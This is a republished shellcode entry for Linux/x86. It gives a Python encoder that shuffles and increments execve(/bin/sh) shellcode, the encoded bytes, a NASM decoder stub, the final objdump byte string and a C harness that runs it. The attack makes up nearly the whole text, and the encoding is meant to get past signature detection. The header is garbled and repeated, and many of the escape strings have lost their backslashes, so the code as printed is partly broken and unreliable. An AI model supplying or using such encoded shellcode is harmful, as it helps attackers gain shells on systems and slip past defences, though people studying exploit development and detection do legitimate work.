Linux x86 Reposition INC Encoder With execve bin sh Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 299

# Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
# Author: Jonathan So
# Date: 15/06/2019
# Purpose: decode and spawn a /bin/sh shell
# Teste # Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
# Author: Jonathan So
# Date: 15/06/2019
# Purpose: decode and spawn a /bin/sh shell
# Tested On: Linux kali 4.19.0-kali4-686 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) i686 GNU/Linux
# Arch: x86
# Size: 66 bytes
# Write-up Link: https://xmilkpowderx.github.io/2019-06-15-SLAEEX4/

======================================================Python Encoder======================================================

#!/usr/bin/python
#execve(/bin/sh)
shellcode = ("x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80")

encoded = ""
encodedP2 = ""
encoded2 = ""
encoded2P2 = ""
count = 1

print 'Encoded shellcode ...'

#Rearrange the position of shellcode and increase each of them by 1
for x in bytearray(shellcode) :
x += 1
if count % 2 != 0:
encoded += '\x'
encoded += '%02x' % x
else:
encodedP2 += '\x'
encodedP2 += '%02x' % x
if count % 2 != 0:
encoded2 += '0x'
encoded2 += '%02x,' % x
else:
encoded2P2 += '0x'
encoded2P2 += '%02x,' % x
count += 1

print encoded + encodedP2
print encoded2 + encoded2P2

print 'Len: %d' % len(bytearray(shellcode))
print 'Replace number to: %d' % (count/2)

======================================================Encoded Shellcode======================================================

Original: x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80
Encoded: x32x51x30x74x69x63x6fxe4x8ax54xe2x0cx81xc1x69x30x69x30x6ax8ax51xe3x8axb1xce

========================================================Decoder.nasm=========================================================

global _start

section .text
_start:

jmp short call_shellcode
decoder:
pop esi
lea edi, [esi + 13] ;half of encoded shellcode len = 25/2 = 13
xor ebx, ebx
xor ecx, ecx
mul ecx
mov edx, esp
mov cl, 13
decode: ;Rearrange the value of shellcode
mov bl, byte[esi] ;get value from esi
dec ebx ;decrease by 1
mov byte[edx + eax], bl
inc eax
mov bl, byte[edi] ;get value from edi
dec ebx ;decrease by 1
mov byte[edx + eax], bl
inc eax
inc esi
inc edi
loop decode

jmp edx

call_shellcode:

call decoder
EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce

======================================================objdump Generated Shellcode======================================================

xebx22x5ex8dx7ex0dx31xdbx31xc9xf7xe1x89xe2xb1x0dx8ax1ex4bx88x1cx02x40x8ax1fx4bx88x1c
x02x40x46x47xe2xeexffxe2xe8xd9xffxffxffx32x51x30x74x69x63x6fxe4x8ax54xe2x0cx81xc1x69
x30x69x30x6ax8ax51xe3x8axb1xce

============================================================Proof of Concept============================================================

#include<stdio.h>
#include<string.h>

unsigned char code[] =
"xebx22x5ex8dx7ex0dx31xdbx31xc9xf7xe1x89xe2xb1x0dx8ax1ex4bx88x1cx02x40x8ax1fx4bx88x1cx02x40x46x47xe2xeexffxe2xe8xd9xffxffxffx32x51x30x74x69x63x6fxe4x8ax54xe2x0cx81xc1x69x30x69x30x6ax8ax51xe3x8axb1xce";

int main(){
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}